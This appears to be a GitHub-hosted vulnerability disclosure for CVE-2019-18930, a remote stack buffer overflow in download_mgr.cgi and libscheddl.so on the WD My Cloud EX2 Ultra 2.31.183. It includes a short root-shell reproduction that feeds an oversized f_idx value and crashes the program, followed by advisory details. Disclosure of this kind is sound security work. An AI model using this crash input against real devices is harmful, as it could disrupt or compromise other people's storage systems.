Permalink
Cannot retrieve contributors at this time
Name already in use
A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
CVE/CVE-2019-18930/description.txt
Go to fileThis commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
64 lines (64 sloc)
1.76 KB
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| > Western Digital | |
| > My Cloud EX2 Ultra 2.31.183 allows web users (including guest account) to | |
| > remotely execute arbitrary code via a stack-based buffer overflow. There is no | |
| > size verification logic in one of functions in libscheddl.so, and | |
| > download_mgr.cgi makes it possible to enter large-sized f_idx inputs. | |
| > | |
| > ------------------------------------------ | |
| > | |
| > [Additional Information] | |
| > root@MyCloudEX2Ultra cgi-bin # export REQUEST_METHOD=GET | |
| > root@MyCloudEX2Ultra cgi-bin # export QUERY_STRING=cmd=Downloads_Schedule_Info\&f_idx=`python -c 'print "a"*0x1f3 + "bbbb"'` | |
| > root@MyCloudEX2Ultra cgi-bin # ./download_mgr.cgi | |
| > I/O warning : failed to load external entity "/mnt/HD_a4/.systemfile/schedcfgs/aaaaaa (etc.) aaaaabbbb.xml" | |
| > Segmentation fault | |
| > | |
| > ------------------------------------------ | |
| > | |
| > [Vulnerability Type] | |
| > Buffer Overflow | |
| > | |
| > ------------------------------------------ | |
| > | |
| > [Vendor of Product] | |
| > Western Digital | |
| > | |
| > ------------------------------------------ | |
| > | |
| > [Affected Product Code Base] | |
| > WD My Cloud EX2 Ultra - 2.31.183 | |
| > | |
| > ------------------------------------------ | |
| > | |
| > [Affected Component] | |
| > libscheddl.so, download_mgr.cgi | |
| > | |
| > ------------------------------------------ | |
| > | |
| > [Attack Type] | |
| > Remote | |
| > | |
| > ------------------------------------------ | |
| > | |
| > [Impact Code execution] | |
| > true | |
| > | |
| > ------------------------------------------ | |
| > | |
| > [Attack Vectors] | |
| > To execute arbitrary code, web users enter the vulnerable cgi file with malicious parameters. | |
| > | |
| > ------------------------------------------ | |
| > | |
| > [Has vendor confirmed or acknowledged the vulnerability?] | |
| > true | |
| > | |
| > ------------------------------------------ | |
| > | |
| > [Discoverer] | |
| > DelspoN & Jeong Jae Young | |
| > | |
| > ------------------------------------------ | |
| > | |
| > [Reference] | |
| > https://support.wdc.com/downloads.aspx?g=907&lang=en |